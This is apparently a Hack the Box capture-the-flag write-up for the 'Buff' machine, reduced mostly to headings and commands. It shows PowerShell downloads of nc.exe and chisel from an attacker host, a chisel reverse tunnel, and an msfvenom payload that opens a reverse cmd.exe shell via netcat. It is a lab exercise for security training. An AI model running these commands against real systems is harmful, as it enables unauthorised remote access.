Hack the Box: Buff

Buff

Recon

Nmap scan
Main page
Contact.php

User

Getting a webshell
User flag

Privilege escalation

Open port 8888 on localhost
# tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        140 K
-- snip --
CloudMe.exe                   6640                            0     37,704 K
-- snip --
CloudMe 1.11.2
# powershell -nop -c "Invoke-WebRequest -Uri http://10.10.14.20/nc.exe -OutFile C:\xampp\htdocs\gym\upload\nc.exe -Verbose"
# powershell -nop -command "iwr 'http://10.10.14.20/chisel.exe' -Outfile 'C:\xampp\htdocs\gym\upload\chisel.exe'"
./chisel_1.6.0_linux_386 server -p 4445 -reverse
chisel.exe client 10.10.14.20:4445 R:8888:127.0.0.1:8888
msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.20 443 -e cmd.exe' -b '\x00\x0a\x0d' -f python
Root flag
